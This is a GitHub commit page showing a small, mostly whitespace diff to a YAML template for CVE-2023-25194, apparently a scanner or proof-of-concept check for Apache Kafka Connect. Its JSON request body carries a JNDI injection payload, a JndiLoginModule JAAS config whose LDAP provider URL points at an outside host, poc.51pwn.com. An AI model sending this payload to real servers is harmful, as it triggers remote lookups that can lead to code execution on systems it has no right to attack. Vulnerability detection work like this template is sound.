Skip to content

Commit 87488d0

Browse files
committed
add config/51pwn/CVE-2023-25194.yaml 2023-02-23
1 parent eab78ad commit 87488d0

File tree

1 file changed

+7
-7
lines changed

1 file changed

+7
-7
lines changed

config/51pwn/CVE-2023-25194.yaml

Lines changed: 7 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -51,21 +51,21 @@ requests:
5151
{"name": "test",
5252
"config":
5353
{
54-
"connector.class":"io.debezium.connector.mysql.MySqlConnector",
54+
"connector.class":"io.debezium.connector.mysql.MySqlConnector",
5555
"database.hostname": "xxxxx",
5656
"database.port": "3306",
5757
"database.user": "root",
5858
"database.password": "xxxxxx",
5959
"database.dbname": "xxxx",
6060
"database.sslmode": "SSL_MODE",
61-
"database.server.id": "1234",
61+
"database.server.id": "1234",
6262
"database.server.name": "localhost",
63-
"table.include.list": "MYSQL_TABLES",
63+
"table.include.list": "MYSQL_TABLES",
6464
"tasks.max":"1",
65-
"topic.prefix": "aaa22",
66-
"debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
67-
"schema.history.internal.kafka.topic": "aaa22",
68-
"schema.history.internal.kafka.bootstrap.servers": "kafka:9202",
65+
"topic.prefix": "aaa22",
66+
"debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
67+
"schema.history.internal.kafka.topic": "aaa22",
68+
"schema.history.internal.kafka.bootstrap.servers": "kafka:9202",
6969
"database.history.producer.security.protocol": "SASL_SSL",
7070
"database.history.producer.sasl.mechanism": "PLAIN",
7171
"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://poc.51pwn.com:1389\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxxx\";"

0 commit comments

Comments
 (0)